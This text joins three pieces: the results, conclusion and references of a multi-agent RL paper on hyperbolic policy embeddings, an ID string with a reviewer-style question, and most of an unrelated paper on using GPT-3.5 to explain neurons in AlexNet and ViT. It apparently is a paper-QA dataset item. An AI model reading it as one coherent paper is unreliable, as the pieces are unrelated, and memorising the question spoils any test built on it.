**Contrastive Agent Representation Learning (CARL):** This baseline is inspired by Papoudakis et al. (2021) and is a non-reconstruction baseline based on contrastive learning (Oord et al., 2018). CARL utilizes the trajectories of modeled agents during training but restricts execution to solely the trajectories of the controlled agent. Further implementation details for this baseline can be found in Appendix B.4. We include this baseline because it is a non-reconstruction method that embraces the idea of contrast and employs trajectory-based learning of policy representations.

4.3 Experiment Results

**Cooperative** Figure 4 shows the mean episode rewards of all methods during training in the five Overcooked environment layouts. These layouts necessitate specific sequences of actions from the agents and display a state evolution resembling a hierarchical tree-like structure.
Our experimental results also validate the effectiveness of our P2R method in learning policy embeddings within the Poincaré ball. It excels at extracting hierarchical information from agent trajectories, resulting in more effective policy embeddings. Furthermore, these policy embeddings encapsulate a richer set of information, which proves advantageous for the decision-making processes of agents.

[Figure 4; panels: (a) Cramped Rm., (b) Asymm. Adv., (c) Coord. Ring, (d) Force Coord., (e) Counter Circ.; legend: P2R-PPO, LIAM-PPO, AMF-PPO, CARL-PPO, PPO]

Figure 4: Average episode rewards on each layout of the Overcooked environment during training; shaded regions indicate the standard deviation over five training seeds.

**Cramped Room:** In this layout, the two agents are prone to collisions in the confined space. If agents perceive their teammate's behavioral characteristics, they adjust their strategies based on their teammate's actions to minimize collisions while completing the task. As shown in Figure 4(a), with P2R-PPO one agent typically learns to complete the task faster during roughly the first 100 iterations of the experiment while the other agent remains inactive, causing minimal interference. The P2R policy embeddings quickly learn the characteristics of the teammate's policy, and both agents operate without interfering with each other, resulting in high scores in the initial stages. As training progresses, the previously inactive agent also attempts to complete the task, leading to collisions in the confined space and reducing task efficiency. The P2R policy embeddings provide behavioral features, such as action execution sequences, for both agents, encouraging faster cooperation. In contrast, the other baselines exhibit a more stable learning process, but significant interference between the two agents occurs even in the initial stages.

**Asymmetric Advantages:** In this layout, the two agents need to learn how to allocate the use of the two pots. If both agents only choose one pot, task completion is inefficient. Therefore, the policy embeddings need to include sufficient hierarchical action information, including the order in which agents select pots, the frequency of pot usage, and time allocation, among others. As shown in Figure 4(b), P2R-PPO, which learns policy embeddings in the Poincaré ball, demonstrates better performance.

**Coordination Ring:** The training process in this layout is similar to that in the *Cramped Room*, as depicted in Figure 4(c). Our P2R-PPO method learns policy embeddings that extract more information about action hierarchy and action sequence relationships, enabling the agents to quickly learn to avoid collisions and efficiently complete tasks.

**Forced Coordination:** In this layout, the right agent handles the two pots and soup delivery, while the left agent is responsible for providing onions and plates. The essence of the challenge lies in coordinating the action execution sequences of the two agents. Moreover, due to the limited positions at the central interaction counter (only three positions), the left agent needs to provide the corresponding raw materials based on the right agent's soup delivery, and the right agent must adjust the order of cooking and delivery based on the sequence of raw materials provided by the left agent. As shown in Figure 4(d), P2R-PPO demonstrates better performance, enabling the agents to learn to cooperate more quickly.
Furthermore, the agents even learn a form of "laziness" to some extent during training. For a period of time, the left agent places multiple onions and plates on the counter, and the right agent takes them one by one, causing both agents to constantly shuttle between their respective corridors. However, the left agent eventually learns to place one onion or plate at a time in the grid next to the pot, and the right agent learns to take raw materials only from the nearest grid. This is because P2R's policy embeddings effectively capture the hierarchical behavioral characteristics of the right agent, and the left agent learns to "slack off" by utilizing the information provided by the policy embeddings.

**Counter Circuit:** In this layout, the most efficient cooperative policy involves passing onions through the central counter instead of both agents continuously circling the ring. As illustrated in Figure 4(e), the two agents using our P2R policy embeddings learn each other's action hierarchy characteristics, significantly improving cooperation efficiency.

**Competitive** In the *Pommerman* experiments, agents move to positions from which they can potentially eliminate their opponents by placing bombs and then quickly retreating. This results in repeated action sequences that exhibit clear hierarchical action patterns, and the evolution of states also demonstrates a tree-like hierarchical structure. To test the effectiveness of the policy embeddings, we combine the opponent's embeddings with the current state as the input for the agent. If the learned opponent policy embeddings are effective, the agent takes the characteristics of the opponent's policy into account when selecting actions; if they are ineffective, the agent cannot obtain information about the opponent, which is directly reflected in the win-rate results. We conducted two sets of experiments: (1) comparing the win rates of all baselines combined with PPO against the naive PPO algorithm, and (2) comparing the win rates among all baselines (including naive PPO) after training for 1000 iterations, with all baselines combined with PPO. In terms of win rates, the combination of the PPO algorithm with policy embeddings learned by P2R achieved the highest win rates in both sets of experiments. This demonstrates that learning policy embeddings within the Poincaré ball is more effective at capturing hierarchical information. The average win rates of baseline agents against naive PPO agents across five training seeds are shown in Figure 5. In the initial stages of the training process, policies are busy exploring the environment and have not yet exhibited hierarchical state-evolution characteristics; therefore, there is not enough information for P2R to learn hierarchical features. As training progresses, all baseline methods effectively learn the characteristics of the opponent's policy, with the P2R method showing superior performance. Moreover, agents in adversarial matches tend to exhibit certain patterns, meaning that policies reveal habitual action sequences. When the P2R method captures such characteristics, it outperforms the other methods when combined with PPO, resulting in higher win rates. The win rates among all baselines (including naive PPO) after training for 1000 iterations are shown in Figure 6.
By comparing the win rates between each baseline and P2R, we observe that our P2R method achieves higher win rates (over 50%) against the other algorithms. In competitive environments where action sequences exhibit strong hierarchical characteristics and state evolution resembles tree-like growth, learning policy embeddings in the Poincaré ball proves effective in capturing the hierarchical features of policies, thereby enhancing the decision-making process.

4.4 EMBEDDING ANALYSIS

We qualitatively visualize the policy embeddings learned by P2R via HoroPCA (Chami et al., 2021). Figure 7 shows the embeddings for 10 test interaction episodes of 5 randomly selected agents, before and after training, in the Forced Coordination layout of Overcooked and in Pommerman, respectively. The policy embedding visualizations for the other environments are in Appendix B.2.

[Figure 7; panels: (a) Forced Coord. initial, (b) Forced Coord. trained, (c) Pommerman initial, (d) Pommerman trained]

Figure 7: Policy embeddings obtained by P2R for 10 test episodes involving 5 randomly selected agents, visualized using HoroPCA for two different environments. Each color represents a distinct agent policy. Intuitively, policy embeddings of the same agent tend to cluster together in space, while those of different agents are dispersed, indicating that P2R effectively captures diverse policy features and exhibits strong discriminative power in policy representation.

The initial policy embeddings in the Poincaré ball are scattered within a certain region. After training, the P2R method distinctly separates the embeddings of the ten test episodes for each of the five agents into five clusters.

5 CONCLUSION

In conclusion, this paper presents a novel framework for multi-agent reinforcement learning (MARL) based on a new geometric policy representation perspective rooted in non-Euclidean hyperbolic projection. By leveraging the hierarchical structure inherent in Markov decision processes (MDPs), our approach projects the trajectories of multiple agents onto a Poincaré ball, enabling policy representations that are both efficient and effective. Our key innovation lies in modeling the policy representation as a tree-growing process from the center of the Poincaré ball to its boundary. To enhance this hierarchical property for further geometric generalization, we design a contrastive objective function that encourages consistent policies to be embedded closer together in the hyperbolic space, while pushing inconsistent policies farther apart. This allows those policies to be represented with low distortion using only a few dimensions, demonstrating the geometric expressiveness of hyperbolic embeddings in MARL. Experimental results showcase the superiority of our P2R framework over state-of-the-art methods across cooperative and competitive games. These findings emphasize the potential of non-Euclidean policy representations for improving the performance and scalability of control policies in complex multi-agent environments.

REFERENCES

Stefano V Albrecht and Peter Stone. Autonomous agents modelling other agents: A comprehensive survey and open problems. *Artificial Intelligence*, 258:66–95, 2018.

Eugenio Beltrami. Teoria fondamentale degli spazii di curvatura costante. *Annali di Matematica Pura ed Applicata (1867-1897)*, 2:232–255, 1868a.

Eugenio Beltrami. *Teoria fondamentale degli spazii di curvatura costante memoria*. F. Zanetti, 1868b.

Thomas Bläsius, Tobias Friedrich, Anton Krohmer, and Sören Laue. Efficient embedding of scale-free graphs in the hyperbolic plane.
*IEEE/ACM transactions on Networking*, 26(2):920–933, 2018. Silvere Bonnabel. Stochastic gradient descent on riemannian manifolds. *IEEE Transactions on Automatic Control*, 58(9):2217–2229, 2013. James W Cannon, William J Floyd, Richard Kenyon, Walter R Parry, et al. Hyperbolic geometry. *Flavors of geometry*, 31(59-115):2, 1997. Micah Carroll, Rohin Shah, Mark K Ho, Tom Griffiths, Sanjit Seshia, Pieter Abbeel, and Anca Dragan. On the utility of learning about humans for human-ai coordination. *Advances in neural information processing systems*, 32, 2019. Edoardo Cetin, Benjamin Chamberlain, Michael Bronstein, and Jonathan J Hunt. Hyperbolic deep reinforcement learning. *arXiv preprint arXiv:2210.01542*, 2022. Ines Chami, Albert Gu, Dat P Nguyen, and Christopher Ré. Horopca: Hyperbolic dimensionality reduction via horospherical projections. In *International Conference on Machine Learning*, pp. 1419–1429. PMLR, 2021. Ting Chen, Simon Kornblith, Kevin Swersky, Mohammad Norouzi, and Geoffrey Hinton. Big self-supervised models are strong semi-supervised learners. In *Advances in Neural Information Processing Systems*, 2020a. Yang Chen, Jiamou Liu, He Zhao, and Hongyi Su. Social structure emergence: A multi-agent reinforcement learning framework for relationship building. In *Proceedings of the 19th International Conference on Autonomous Agents and MultiAgent Systems*, pp. 1807–1809, 2020b. Andrej Cvetkovski and Mark Crovella. Hyperbolic embedding and routing for dynamic graphs. In *IEEE INFOCOM 2009*, pp. 1647–1655. IEEE, 2009. Bhuwan Dhingra, Christopher Shallue, Mohammad Norouzi, Andrew Dai, and George Dahl. Embedding text in hyperbolic spaces. In *Proceedings of the Twelfth Workshop on Graph-Based Methods for Natural Language Processing (TextGraphs-12)*, pp. 59–69, 2018. Octavian Ganea, Gary Bécigneul, and Thomas Hofmann. Hyperbolic neural networks. *Advances in neural information processing systems*, 31, 2018. Dibya Ghosh and Marc G Bellemare. Representations for stable off-policy reinforcement learning. In *International Conference on Machine Learning*, pp. 3556–3565. PMLR, 2020. Ghost Town Games. Overcooked, 2016. [https://store.steampowered.com/app/448510/Overcooked/](https://store.steampowered.com/app/448510/Overcooked/). Aditya Grover, Maruan Al-Shedivat, Jayesh Gupta, Yuri Burda, and Harrison Edwards. Learning policy representations in multiagent systems. In *International conference on machine learning*, pp. 1802–1811. PMLR, 2018. He He, Jordan Boyd-Graber, Kevin Kwok, and Hal Daumé III. Opponent modeling in deep reinforcement learning. In *International conference on machine learning*, pp. 1804–1813. PMLR, 2016.
01ep65umEr
How does the GPT explanation help to understand the neural network's internal decision process? Deep learning models are known to use distributed representations, meaning that no single neuron determines the final decision. How could the proposed method be used to explain the cooperative behavior of neurons, in order to help people understand how the vision model arrives at its decision?
TELLME WHAT YOU SEE: USING LLMs TO EXPLAIN NEURONS IN VISION MODELS

Anonymous authors
Paper under double-blind review

ABSTRACT

As the role of machine learning models continues to expand across diverse fields, the demand for model interpretability grows. This is particularly crucial for deep learning models, which are often referred to as black boxes due to their highly nonlinear nature. This paper proposes a novel method for generating and evaluating concise explanations for the behavior of specific neurons in trained vision models. Doing so signifies an important step towards better understanding the decision-making in neural networks. Our technique draws inspiration from a recently published framework that utilized GPT-4 for interpretability of language models. Here, we extend the method to vision models, offering interpretations based on both neuron activations and weights in the network. We illustrate our approach using an AlexNet model and a ViT trained on ImageNet, generating clear, human-readable explanations. Our method outperforms the current state-of-the-art in both quantitative and qualitative assessments, while also demonstrating superior capacity in capturing polysemic neuron behavior. The findings hold promise for enhancing transparency, trust, and understanding in the deployment of deep learning vision models across various domains. The relevant code can be found in our GitHub repository.

1 INTRODUCTION

With the increasing prevalence of complex machine learning models in various domains of life, there has been a rising demand for interpretability. Understanding why these models make the decisions they do is crucial, not just from a research perspective, but also for ethical and societal reasons. Deep learning models, especially, are often seen as black boxes due to their complex and highly nonlinear nature. This challenge is particularly evident in the context of vision models, where the relationship between inputs (image pixels) and outputs (class labels) is often not straightforward. In this paper, we address this challenge by developing a method for generating and evaluating short explanations for the behavior of individual neurons in trained vision models. To the best of our knowledge, this is the first time a Large Language Model (LLM) has been used this way. Additionally, by leveraging the power of LLMs, our method does not require training a specialized model, and instead offers a way to assess the quality of the explanations at scale.

Interpreting the computations performed by deep networks has been split into three major sub-areas: visualization, probing, and explaining single neurons.

**Visualization** The most common visualization technique for interpretability is finding the input image that maximally activates a specific neuron (Erhan et al., 2009; Yosinski et al., 2015; Olah et al., 2017). Beyond that, visualization has been used to offer additional insights into feature importance (Sundararajan et al., 2017; Zhou et al., 2015) and to better understand the self-attention mechanism of transformers (Vig, 2019; Brașoveanu & Andonie, 2020).

**Probing** Another popular technique is using a secondary (often much smaller) classifier to estimate the type of information encoded in the hidden state of the main model. To that end, the secondary model is trained to predict a class (e.g., Part-of-Speech, Named Entities, Semantic Roles, Polarity) given the hidden states of a network layer from the main model.
The efficacy of the prediction indicates what information is encoded. This technique was first introduced by Alain & Bengio (2017) and has since been used to identify the role of specific neurons (Bau et al., 2020; Suau et al., 2020) and the level of complexity at different layers in transformer networks (Tenney et al., 2019; Voita et al., 2019; Raganato & Tiedemann, 2018; Nostalgebraist).

Figure 1: Left: The 25 highest activating images for an example neuron (neuron 489 of the second-last hidden layer) from an AlexNet model trained on ImageNet. Right: The generated explanation for this neuron, from the current SoTA method (CLIP-Dissect) and the three methods proposed in this paper (GPT (Weight-Label), GPT (Weight-CLIP), GPT (Caption-Activation)).

**Explaining Single Neurons** Most relevant to this work is the line of research that aims to find short explanations for individual neurons. Techniques employed to do so include manual inspection (Miller & Neo), creating a custom dataset and training a specialized classifier (Bau et al., 2017), and comparing the embedding similarities of images activating a specific neuron and text embeddings using a trained Vision-Language Model (Oikarinen & Weng, 2023). Additionally, Hernandez et al. (2022) trained an RNN to generate natural language descriptions of neurons in vision models, and Bills et al. (2023) used GPT-4 to generate short explanations of neurons in GPT-2 based on the words the neuron activated for. Notably, Bills et al. (2023) have also provided a way to quantitatively assess the quality of explanations. Namely, they use a secondary GPT-4 model to simulate the activations of a neuron given the explanation, and judge the quality of the explanation based on the correlation score (here, and in the remainder of the paper, we denote $100 \times$ the correlation coefficient as the correlation score) the simulation achieves relative to the actual activations.

Our method is rooted in the framework introduced by Bills et al. (2023). However, we explain individual neurons in vision models, rather than language models, and do so via both the activations and the weights of the network. The key contributions of the paper are:

1. We generate short, easy-to-understand explanations of neuron selectivity in a trained vision model with two different techniques: first, using the weights of the model, and second, using image-caption/neuron-activation pairs.

2. We are the first to propose a reliable and scalable explanation scoring algorithm for neurons in vision models.

3. We show that the proposed method works for other vision models, including a ViT.

4. We show that our proposed methods are better at capturing polysemanticity, easier to understand, and quantitatively perform better than the current state-of-the-art.

The remainder of the paper is structured as follows: in Section 2 we highlight relevant related work, and in Section 3 we present our methods in detail. We benchmark our methods against the current state-of-the-art in Section 4 and finally conclude in Section 5.

2 RELATED WORK

Out of the three main interpretability techniques described in Section 1, "Explaining Single Neurons" is most relevant to our work. As mentioned, interpretability can generally be sub-divided based on the techniques used to elucidate neuron explanations. Manually inspecting neurons and collecting specific datasets both introduce enough overhead that they are not practical solutions for practitioners.
Thus, we will be focusing on similarity-based explanations and open-ended explanations.

2.1 SIMILARITY-BASED EXPLANATIONS

The recently published work by Oikarinen & Weng (2023) uses a trained Vision-Language Model (VLM) to generate similarity-based explanations in three steps.

1. First, the VLM is used to separately embed a set of probing images (which can be unlabeled) and a set of concept words. Subsequently, the concept-activation matrix is calculated by taking the inner product of each of the text and image embeddings.

2. Second, given a specific neuron that we want to explain, the activation of this neuron for each image in the probing set is recorded.

3. Lastly, the similarity between the activation vector from the second step and each column of the matrix from the first step is determined. The concept for the column with the highest similarity is used to describe the neuron.

This method has a good cost-quality trade-off. While it is very cheap and fast to run, it has two shortcomings. Firstly, the one-term explanations it generates (e.g., "terrier", "feather", "nursery") are not very nuanced and thus might miss subtleties of the neuron encoding. Secondly, there is a body of research documenting the prevalence of polysemantic neurons in deep learning models (Elhage et al., 2022; Olah et al., 2020). Naturally, it is hard to describe a neuron that looks for a multitude of potentially very different objects with a single term.
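To make the three steps concrete, the following is a minimal sketch in the spirit of this similarity-based procedure. The `image_embs`/`concept_embs` inputs stand in for VLM (e.g., CLIP) embeddings computed elsewhere, and the use of a simple normalized correlation as the similarity function is our simplification; CLIP-Dissect itself supports several similarity measures.

```python
import numpy as np

def describe_neuron(image_embs, concept_embs, concepts, activations):
    """Similarity-based neuron description following the three steps above.

    image_embs:   (N, d) embeddings of the probing images (assumed precomputed)
    concept_embs: (C, d) embeddings of the concept words (assumed precomputed)
    concepts:     list of C concept strings
    activations:  (N,) activations of the target neuron on the probing images
    """
    # Step 1: concept-activation matrix via inner products of image/text embeddings.
    concept_matrix = image_embs @ concept_embs.T  # shape (N, C)
    # Step 2: `activations` records the neuron's response to each probing image.
    a = (activations - activations.mean()) / (activations.std() + 1e-8)
    # Step 3: compare the activation vector with each column of the matrix.
    cols = (concept_matrix - concept_matrix.mean(0)) / (concept_matrix.std(0) + 1e-8)
    similarities = cols.T @ a / len(a)  # one correlation-style score per concept
    return concepts[int(np.argmax(similarities))]
```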
2.2 OPEN-ENDED EXPLANATIONS

The most important work in this area is the recently published paper "Language models can explain neurons in language models" by Bills et al. (2023). In their work, the authors used GPT-4 to generate human-understandable explanations for individual neurons in GPT-2 (a large language model) based on how strongly they activate for various input words. Beyond simply generating explanations, they used a separate GPT-4 model to simulate the neuron activity for a test sentence based on the generated explanation, assessing the quality thereof by calculating the correlation between the real and the simulated activations. Though this is not the first work able to generate human-understandable explanations for individual neurons (see Hernandez et al. (2022)), to the best of our knowledge, it is the only work that does not require training a specialized model, generates high-quality text, and, most importantly, offers a method of assessing the quality of the explanations at scale.

3 METHOD

Our paper proposes two separate methods for explaining singular neurons in a trained vision model. First, we describe the activation-based method, and subsequently the weight-based method. Both methods consist of an explanation generation component and an explanation assessment component. Unless specified otherwise, we use an AlexNet classifier trained on ImageNet and gpt-3.5-turbo-0613 for all experiments. However, it is worth pointing out that, given the results from Olah et al. (2020); Chughtai et al. (2023) and our experiments on Vision Transformers, our method is very likely to generalize to other vision models.

3.1 Activation-based Explanations

Out of the two proposed methods, generating explanations based on neuron activations is most similar to the work proposed by Bills et al. (2023). Since GPT-2 is a text-based model, it is relatively easy to extract token-activation pairs for a specific neuron and, based on that, to find and test explanations. However, since the GPT family of models does not yet support multi-modal inputs, and open-source Vision-Language Models (VLMs) are not as capable as the GPT models, we need to use another model as the intermediary. To be more specific, we find captions for all images in the ImageNet (Russakovsky et al., 2014) validation set using BLIP (Li et al., 2022), and track the activation intensity specific neurons have for each image. Based on these Caption-Activation pairs we can generate and assess explanations. A diagram explaining the method can be seen in Figure 2 (the corresponding pseudocode for Figure 2 can be found in Appendix A.1).

**Figure 2:** Overview of the proposed Caption-Activation method. An LLM is used to generate a human-readable explanation of an individual neuron's behavior, given a set of captions and activations. Then, an independent second LLM is used to generate the neuron's simulated (predicted) activations, given the generated explanation and a set of captions. The correlation between the simulated and actual activations is then calculated. Snowflake symbols indicate that models are frozen.

3.1.1 Generating Explanations

To generate open-ended natural language explanations for the activity of a specific neuron, we utilize the well-documented ability of GPT to be an effective few-shot predictor. We show it a number of few-shot examples, each consisting of Caption-Activation pairs for a neuron other than the one to be labeled, and then task GPT with generating a short explanation based on the Caption-Activation pairs of the neuron that is to be labeled. Details for determining the optimal number of few-shot examples and the size of the subset of Caption-Activation pairs shown to the model can be found in Appendix B.1.2. Following Bills et al. (2023), we simplify the task at hand for GPT by expressing the activations as integers in the range \([0, 10]\). The full prompt used can be found in Appendix D.1.

3.1.2 Assessing Explanations

Accurately determining how fitting these explanations are is even more important than generating them. To do so, we prompt a GPT-3.5 model with image captions and the neuron's generated explanation to determine how strongly the neuron will activate for each caption. To simplify the task for GPT, we provide some few-shot examples, scale all activations to the range \([0, 10]\), and round them to integers, similar to Bills et al. (2023). It is worth pointing out that we are using gpt-3.5-turbo-0613 and are thus limited to a 4K context window. This means that, at any one time, we are only able to show GPT a subset of the available Caption-Activation pairs. We conduct some hyperparameter tuning in Appendix B.1.1 to determine the optimal number of few-shot examples and the size of the Caption-Activation subset. The full prompt for assessing neuron explanations can be found in Appendix D.2. Finally, using the simulated activations, we determine the correlation to the true activations and use this as a measure of success for the explanation. Since we will later introduce correlation scores with targets other than the neuron activations, from now on we refer to this one as the Correlation Score (Caption-Activation). One big challenge with using a subset of the images and few-shot examples is the variance in the correlation scores achieved by different runs.
To fight this, we iteratively re-assess the same explanation until the 90% Confidence Interval (CI) of the average is < ±5 (see Algorithm 1).

**Algorithm 1 Explanation Scoring**

Require: Neuron explanation.
Scores = []
while len(Scores) < 3 or CI(Scores) > 5 do
    Scores.append(Score(Simulate(Neuron explanation)))
end while

where \( CI(x) = T_{0.95,\text{sample\_size}-1} \cdot \frac{\text{sample\_std}}{\sqrt{\text{sample\_size}}} \) (\(T\) being the t-score corresponding to the critical value for a two-tailed test), Score(x) determines the correlation of the simulated activations with the actual activations, and Simulate(x) simulates the neuron activations based on the neuron explanation using GPT. The main purpose of the algorithm is to save cost, since the alternative would be to run it for a constant (high) number of iterations and then take the average. Using the algorithm, we can stop as soon as it is sensible to do so (i.e., once the 90% CI of the average is < ±5).
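A minimal Python rendering of Algorithm 1. The `simulate_activations` callable stands in for the GPT-based simulator and is an assumption of ours; the t-based CI follows the definition above.

```python
import numpy as np
from scipy import stats

def confidence_interval(scores, level=0.90):
    """Half-width of the t-based CI around the mean score."""
    n = len(scores)
    t = stats.t.ppf(1 - (1 - level) / 2, df=n - 1)
    return t * np.std(scores, ddof=1) / np.sqrt(n)

def score_explanation(explanation, captions, true_acts, simulate_activations):
    """Re-assess an explanation until the 90% CI of the mean score is < +/-5."""
    scores = []
    while len(scores) < 3 or confidence_interval(scores) > 5:
        sim = simulate_activations(explanation, captions)  # GPT-simulated activations
        corr = np.corrcoef(sim, true_acts)[0, 1]
        scores.append(100 * corr)  # correlation score = 100 x correlation coefficient
    return float(np.mean(scores))
```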
### 3.2 Weight-based Explanations

Besides proposing an activation-based explanation for neurons, we introduce a separate technique that utilizes the weights of the trained network. As will become evident, the last hidden layer and all other layers have to be treated differently; thus, we will first explain how the assessment and generation work for the last hidden layer and subsequently generalize this to the whole network. Since we do not have access to the input-activation pairs when only using the weights to generate and assess explanations, we will extract the Weight-Label pairs (where the Labels are the ImageNet classes). This has the advantage of not relying on an image captioning model and not requiring us to pass a number of images through the network. However, just because a specific neuron is connected to a specific output label with a high weight does not necessarily mean that the object related to the output class does indeed trigger high activations of the neuron. Furthermore, as we go deeper into the net (counting from the output layer), the features present will likely become increasingly abstract. Thus, it is not clear that the model, solely based on the class names and weights, is able to generate meaningful explanations for specific neurons. Figure 3 shows a diagram of the method (the corresponding pseudocode for Figure 3 can be found in Appendix A.2).

#### 3.2.1 Generating Explanations

The key difference to the technique used in Section 3.1.1 is that we use Weight-Label pairs rather than Caption-Activation pairs. Other than that, we follow the same preprocessing as in Section 3.2.2 and the hyperparameters determined in Appendix B.2.2. The full prompt used can be found in Appendix D.4.

#### 3.2.2 Assessing Explanations

Since the explanations are generated based on weights, we will assess them based on how well a secondary GPT model can predict the weights associated with each output class given a neuron explanation.

Figure 3: Overview of the proposed Weight-Label method. An LLM is used to generate a human-readable explanation of an individual neuron's behavior, given a set of labels and the magnitudes of the weights that connect the neuron to be explained to those labels. Then, a second, independent LLM is used to simulate the neuron's weights for another set of labels. The correlation between the simulated and actual weights is then calculated. Snowflake symbols indicate that models are frozen.

To simplify this task, we will set all negative weights to zero for now, scale the positive ones into the range $[0, 10]$, and convert them to integers. Besides the above-mentioned differences, we still utilize some few-shot examples, each of which contains a subset of the 1000 Weight-Label pairs (the subsetting is required since we are using a 4K context window). The fine-tuning for these hyperparameters can be found in Appendix B.2.1, and the final prompt used can be found in Appendix D.5. Following our set-up in Section 3.1.2, we quantify the explanation quality using the correlation score between the actual and predicted weights. Again, to make the results reliable, the same explanation is re-assessed until the 90% CI is < ±5 (using Algorithm 1).

### 3.2.3 Generalizing to Other Layers

As already mentioned, the last hidden layer is somewhat of a special case, as it is directly connected to the output layer and, with that, the class labels. Thus, it is very easy to extract the Weight-Label pairs. However, since this cannot be done for the remaining layers of the network, we propose three different techniques, namely:

**Naively combining weights** The easiest method to implement is to estimate the weights connecting, for example, the second-last hidden layer (or any other layer) to the output layer by taking the dot product of the weight matrices:

$$W_{est} = W_t \cdot W_{t-1} \cdots W_{target}, \quad (1)$$

where $W_{est}$ is the estimated weight matrix and $W_t$ is the weight matrix connecting the $t-1$-th hidden layer to the $t$-th (final) hidden layer. Though this estimate is not perfect, as it disregards the activation function and will make it harder for the model to determine the level of abstraction of the current neuron, it is fast and cheap and will serve well as a baseline. For the remainder of the paper, we will refer to this method as Weight-Label.

**Using CLIP-Dissect labels as targets** Alternatively, it is possible to use simpler (and, more importantly, cheaper) methods to label all neurons of a specific layer with simplistic explanations, and then use these explanations as target-weight pairs. In our experiments, we use CLIP-Dissect (Oikarinen & Weng, 2023) for this. This method makes it easier for GPT to determine the level of abstraction required for the explanation, but it might introduce inaccuracies for both explanation generation and assessment, as it relies on a secondary model. Furthermore, as we will show later, these simplistic methods do not capture polysemanticity well. For the remainder of the paper, we will refer to this method as Weight-CLIP.

**Using GPT explanations as targets** Lastly, it is possible to label a whole layer using our method before moving on to the next layer. The next layer can then simply use the Weight-Explanation pairs to generate the next explanations. Though this method seems most promising, it has the obvious shortcoming of being by far the most expensive. Labeling the full last hidden layer of AlexNet would cost: # of Neurons × # API calls per Neuron × avg. prompt length (K tokens) × API cost per 1K tokens = 4096 × 25 × 2.5 × 0.0015 ≈ 384 USD. Due to the high cost, we did not test this method in this work but offer it as a proposal.
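A small sketch of the naive weight combination (Equation (1)) together with the preprocessing from Section 3.2.2 (zeroing negative weights and quantizing the rest to integers in [0, 10]); the layer-ordering convention of the input list is our assumption.

```python
import numpy as np

def estimate_weights_to_output(weight_mats):
    """Eq. (1): chain weight matrices from the target layer up to the output layer.

    weight_mats: [W_target, ..., W_t] in forward order, W_l of shape (n_l, n_{l-1});
    activation functions are ignored, as noted in the text.
    """
    W_est = weight_mats[-1]
    for W in reversed(weight_mats[:-1]):
        W_est = W_est @ W
    return W_est  # shape: (n_outputs, n_neurons_in_target_layer)

def quantize_positive_weights(w):
    """Zero out negatives, scale positives into [0, 10], round to integers."""
    w = np.maximum(w, 0.0)
    if w.max() > 0:
        w = 10.0 * w / w.max()
    return np.rint(w).astype(int)
```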
4 EXPERIMENTS

To test the quality of the proposed methods, we first generate explanations for neurons in an AlexNet model trained on ImageNet via several different methods. These explanations will be assessed both quantitatively (based on the weight correlation and activation correlation) and qualitatively (by visualizing the subset of images in the ImageNet validation set that trigger the highest activations in the neuron we are explaining). Subsequently, we will show the quantitative results of our method when explaining neurons in a Vision Transformer. It is important to highlight that we report all results without cherry-picking. Below we benchmark our techniques on Neuron 489 of the second-last hidden layer. This neuron was selected randomly, and examples of other neurons can be found in Appendix C. Since the GPT-based methods require some few-shot examples, we hand-label 3 other neurons from the layer in question. The techniques we benchmark are:

• CLIP-Dissect: As our baseline, we use the CLIP-Dissect method proposed by Oikarinen & Weng (2023), using their official code base.\footnote{https://github.com/Trustworthy-ML-Lab/CLIP-dissect}

• GPT (Caption-Activation): We use the BLIP-generated image captions and neuron activation magnitude pairs as features, as described in Section 3.1. The Correlation Score (Caption-Activation) simulates the activations of a neuron given the explanation.

• GPT (Weight-Label): As described in Section 3.2.3, this version of our method uses the Weight-output class pairs as features for generating the explanations, and the Correlation Score (Weight-Label) uses them for the simulation and subsequent assessment. For layers beyond the first hidden layer, the weight matrix from the current layer to the output layer is estimated via Equation (1).

• GPT (Weight-CLIP): As described in Section 3.2.3, this version of our method uses the Weight-CLIP-Dissect pairs as features. To that end, we used the CLIP-Dissect method to label all neurons in the network, and then simply extracted the Weight-CLIP pairs, similarly to how the Weight-Label pairs are extracted from the last hidden layer. The Correlation Score (Weight-CLIP) aims to predict the Weight-CLIP pairs given a short neuron explanation.

Additional experiments using LLMs other than GPT-3.5 can be found in Appendix C.2.

4.1 QUANTITATIVE ANALYSIS

Table 1 shows the average Correlation Scores achieved by the various methods. Each method was used to generate 10 different explanations, and the highest-scoring one is reported. The reason for doing so is that when actually using the methods to label a network, one has access to this information and presumably tries to find the best-fitting explanation (rather than the average).

| Method | Caption-Activation | Weight-Label | Weight-CLIP |
|---|---|---|---|
| CLIP-Dissect | 0.0% | 3.28% | 1.43% |
| GPT (Caption-Activation) | 15.43% | 31.20% | 6.51% |
| GPT (Weight-Label) | 16.11% | 51.58% | 8.27% |
| GPT (Weight-CLIP) | 5.47% | 9.38% | 22.05% |

Table 1: The correlation scores achieved by the various methods, as assessed with three different targets each (each column gives the Correlation Score for the named target).

As expected, the methods that use a specific feature pair tend to do best when assessed on that feature pair, i.e., GPT (Weight-CLIP) does better than the other methods on the Correlation Score (Weight-CLIP). Overall, however, GPT (Weight-Label) clearly does best, with the best performance on two out of three metrics and decent performance on the last one.
This is a somewhat surprising result, as the Weight-Label pairs offer by no means definitive insight into which aspect of the image the neuron is activating for (e.g., a neuron might very well be activating for images containing planes, but only because these images tend to have the sky as the background). However, given the results from the table, it is clear that these implicit descriptions are good enough to generate a strong explanation. It is worth pointing out that for the Correlation Score (Weight-Label) and (Weight-CLIP), we are only considering the positive weights (as mentioned in Section 3.2.2). All other weights have been zeroed. The case with negative weights is analyzed in Appendix C.3.1.

4.2 Additional Qualitative Results

In addition to the qualitative results shown in Figure 1, we show 20 of the highest activating images for the three remaining neurons we explained in AlexNet, side-by-side with the generated explanations as well as the Correlation Score (Weight-Label) (see Figure 4).

4.3 Explaining a ViT

Following Oikarinen & Weng (2023), we conducted additional experiments with our method on the last hidden layer of a ViT-B-16 (trained on ImageNet). We used the Weight-Label approach, since it worked best in our main experiments. To provide some additional insights, we also report the Accuracy (Acc.), Mean Squared Error (MSE), and Mean Absolute Error (MAE), in addition to the achieved correlation scores (Corr.), all calculated for the simulated weights vs. the true weights. The neurons were selected randomly, and we report all results without any cherry-picking.

| Neuron | Corr. | Acc. | MSE | MAE |
|---|---|---|---|---|
| 50 | 18.66% | 8% | 13.34 | 3.22 |
| 75 | 19.10% | 30% | 12.98 | 2.66 |
| 122 | 50.47% | 28% | 5.96 | 1.84 |
| 150 | 23.11% | 34% | 11.18 | 2.34 |
| 457 | 26.78% | 24% | 7.20 | 2.12 |
| 489 | 22.08% | 44% | 6.62 | 1.70 |
| 746 | 30.89% | 38% | 5.04 | 1.52 |
